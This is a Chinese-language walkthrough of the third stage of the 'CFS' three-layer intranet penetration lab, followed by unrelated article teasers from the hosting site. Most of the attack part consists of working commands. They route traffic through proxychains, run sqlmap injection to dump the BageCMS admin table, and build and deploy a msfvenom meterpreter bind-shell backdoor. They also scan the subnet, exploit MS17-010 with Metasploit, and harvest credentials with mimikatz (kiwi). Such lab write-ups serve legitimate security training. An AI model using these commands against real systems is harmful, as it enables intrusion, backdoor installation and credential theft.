CFS三层内网渗透——第二层内网打点并拿下第三层内网(三)

目录

八哥cms的后台历史漏洞

配置socks代理

​以我的kali为例,手动添加

socks配置好了,直接sqlmap跑

​登录进后台

 蚁剑配置socks代理

​ 测试连接 ​编辑

成功上线 

上传正向后门 

生成正向后门

上传后门

​内网信息收集

​进入目标二内网机器,搞个路由转发

方法一

在知道账户密码的情况下流量代理转发就可以远程连接桌面 

方法二 

永恒之蓝打

成功打入,拿下内网三的主机

 获取密码凭证,获得密码后就可以用方法一进行远程桌面连接


八哥cms的后台历史漏洞

该路径存在sql注入漏洞,利用sqlmap跑出账户和密码

http://192.168.22.22/index.php?r=vul&keyword=1

配置socks代理

因为他是在内网里面,配置socks流量转发代理

vim /etc/proxychains4.conf

以我的kali为例,手动添加

socks 192.168.20.128 20000         #上面我socks转发代理用的就是20000端口

socks配置好了,直接sqlmap跑

proxychains sqlmap -u 'http://192.168.22.22/index.php?r=vul&keyword=1' -p keyword  --dbs
proxychains sqlmap -u 'http://192.168.22.22/index.php?r=vul&keyword=1' -p keyword  -D bagecms --tables
proxychains sqlmap -u 'http://192.168.22.22/index.php?r=vul&keyword=1' -p keyword  -D bagecms -T bage_admin --dump


 登录进后台

账户:admin
密码:123qwe

 看到后台网页首页的源代码,如果有php一句话就开始尝试,没有就直接手动添加

 蚁剑配置socks代理

 测试连接 

成功上线 

上传正向后门 

生成正向后门

msfvenom -p linux/x64/meterpreter/bind_tcp lport=30000 -f elf -o 30000_bind.elf  

上传后门

记得给后门执行权限

 先上线再监听,因为这个是正向shell

handler -p linux/x64/meterpreter/bind_tcp -H 192.168.22.22 -P 30000

 内网信息收集

./fscan -h 192.168.33.0/24

进入目标二内网机器,搞个路由转发

run autoroute -s 192.168.33.0/24

方法一

在知道账户密码的情况下流量代理转发就可以远程连接桌面 

 proxychains rdesktop -u administrator -p root 192.168.33.33

 

方法二 

永恒之蓝打

search ms17_010
use 1
set payload windows/x64/meterpreter/bind_tcp              #正向shell
set rhost 192.168.33.33                            #目标内网三的ip
set lport 30001                                    #内网三设置一个开启的端口
run

成功打入,拿下内网三的主机

 获取密码凭证,获得密码后就可以用方法一进行远程桌面连接

load kiwi           #就是咱们那个mimikatz
creds_all           #看凭证获取密码

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/773967.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

SAP-SD同一物料下单价格确不同

业务说明: 业务部门反馈,同一物料下销售订单时,价格确不同。 那么这个价格是怎么取到的呢? 逻辑说明: 1、首先查看销售订单 可以看到相同物料价格是不同的,条件类型都是ZPR5,但是客户是不同…

相关款式1111

一、花梨木迎客松 1. 风速打单 发现只有在兄弟店铺有售卖 六月份成交订单数有62笔 2. 生意参谋 兄弟店铺商品访客数:3548,支付件数:95件 二. 竹节茶刷(引流) 1. 风速打单 六月订单数有165笔 兄弟:…

揭秘数据之美:【Seaborn】在现代【数学建模】中的革命性应用

目录 已知数据集 tips 生成数据集并保存为CSV文件 数据预览: 导入和预览数据 步骤1:绘制散点图(Scatter Plot) 步骤2:添加回归线(Regression Analysis) 步骤3:分类变量分析&…

Mall,正在和年轻人重新对话

【潮汐商业评论/原创】 结束了一下午的苦闷培训,当Cindy赶到重庆十字大道时,才发现十字路口上的巨大“飞行棋”在前两天就已经撤展了。 “来了又错过,就会觉得遗憾,毕竟这样的路口不多,展陈又不可能会返场。” 飞行棋…

藏文作文写作业推荐什么学习工具?《藏文翻译词典》App值得你使用,一款好用准确的藏语词汇查询辞典!

探索藏语的奥秘,体验藏族文化的魅力,尽在《藏文翻译词典》App。这款App是藏汉翻译的神器,也是藏语学习者的必备工具。在学习过程中遇到不会的藏语单词,可以使用《藏文翻译词典》App进行查询! 主要特性: 藏…

SCT612404通道,高效高集成,摄像头模组电源集成芯片

集成三路降压变换器,1CH高压BUCK,2CH低压Buck >HVBuck1:输入电压4.0V-20V,输出电流1.2A,Voo300mV/500mV >LVBuck2:输入电压2.7V-5V,输出电流0.6A , 固定1.8V输出 ;LVBuck3:输λ2.7V-5V,输出电流1.2A,可设定固定输出: 1 . 1 V / 1 . 2 V / 1 . 3 …

Intellj idea无法启动

个人电脑上安装的是2024.01版本的intellj idea作为开发工具,引入了javaagent作为工具包 但是在一次invaliad cache操作后,intellj idea就无法启动了,双击无响应。 重装了idea后也无效(这个是有原因的,下面会讲&#…

开发人员使用的10大主流任务进度管理工具

本文将分享10大优质任务管理软件:Worktile、PingCode、Asana、Todoist、ClickUp、HubSpot Task Management、Hitask、Smartsheet、ProjectManager、Microsoft To Do。 任务管理软件不仅帮助个人和团队跟踪日常任务,还优化了工作流程,确保项目…

Linux/Ubuntu访问局域网共享文件夹

文件夹中找到“Other Location”,输入“smb:IP地址/共享文件夹名称”,然后点击connect后者直接回车即可! End!

Redis 主从,哨兵,cluster集群

概述 主从复制 主从复制是高可用Redis的基础,哨兵和集群都是在主从复制基础上实现高可用的。 主从复制主要实现了数据的多机备份,以及对于读操作的负载均衡和简单的故障恢复。 缺陷:故障恢复无法自动化;写操作无法负载均衡&am…

联合查询(多表查询)

多表查询是对多张表的数据取笛卡尔积(关联查询可以对关联表使用别名) 数据准备 insert into classes(name, desc) values (计算机系2019级1班, 学习了计算机原理、C和Java语言、数据结构和算法), (中文系2019级3班,学习了中国传统文学), (自动化2019级5…

Mysql 的第二次作业

一、数据库 1、登陆数据库 2、创建数据库zoo 3、修改数据库zoo字符集为gbk 4、选择当前数据库为zoo 5、查看创建数据库zoo信息 6、删除数据库zoo 1)登陆数据库。 打开命令行,输入登陆用户名和密码。 mysql -uroot -p123456 ​ 2)切换数据库…

前端修改audio背景色

1.查看浏览器设置Show user agent shadow DOM是否打开 2.打开可以查看audio Dom /** 去掉默认的背景颜色 */ audio::-webkit-media-controls-enclosure{background-color:unset; } 3.效果图

浅谈OpenCV的多对象匹配透明图像的实现,以及如何匹配半透明控件

引子 OpenCV提供的templateMatch只负责将(相关性等)计算出来,并不会直接提供目标的对应坐标,一般来说我们直接遍历最高的相关度,就可以得到匹配度最高的坐标。但是这样一般只能得到一个坐标。在实际操作中,…

边缘计算赋能:高效固体废物管理的ARMxy工业计算机实践

固体废物处理成为城市管理与环境保护的重要议题。传统处理方式效率低下且环境污染风险高,迫切需要智能化、高效化的解决方案。在此背景下,基于ARM架构的工业计算机以其低功耗、高性能及高度可定制性,正逐渐成为智能固体废物处理系统的核心驱动…

html三级菜单

示例 <!DOCTYPE html> <html lang"en"> <head> <meta charset"UTF-8"> <meta name"viewport" content"widthdevice-width, initial-scale1.0"> <title>Menu Example</title> <link re…

工作效率飞跃提升

Hey小伙伴们&#x1f44b;&#xff0c;今天我要来给大家种草几款让我效率翻倍的超实用工具&#x1f6e0;️&#xff01;如果你也常常感觉时间不够用&#xff0c;这些小帮手绝对能让你事半功倍哦✨&#xff01; 1️⃣ 亿可达 — 软件连接器&#x1f517; 作为一款自动化工具&am…

SVN回退版本

我是直男, 所以, 就直接进入主题了 先本地备份要重新上传的代码文件 回退版本 ↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓ → 然后提交刚刚回退的文件(别忘了) ← ↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑ 到这里…

【Python机器学习】处理文本数据——将文本数据表示为词袋

用于机器学习的文本有一种最简单的方法&#xff0c;也是最有效且最常用的方法&#xff0c;就是使用词袋表示。使用这种表示方法时&#xff0c;我们舍弃了输入文本中的大部分结构&#xff0c;比如章节、段落、句子和格式&#xff0c;只计算语料库中&#xff0c;只计算语料库中每…

Elasticsearch实战教程:如何使用集群索引数据来进行统计多个数据?

&#x1f3ac; 鸽芷咕&#xff1a;个人主页 &#x1f525; 个人专栏: 《C干货基地》《粉丝福利》 ⛺️生活的理想&#xff0c;就是为了理想的生活! 引入 Elasticsearch聚合查询是一种强大的工具&#xff0c;允许我们对索引中的数据进行复杂的统计分析和计算。本文将详细解释一…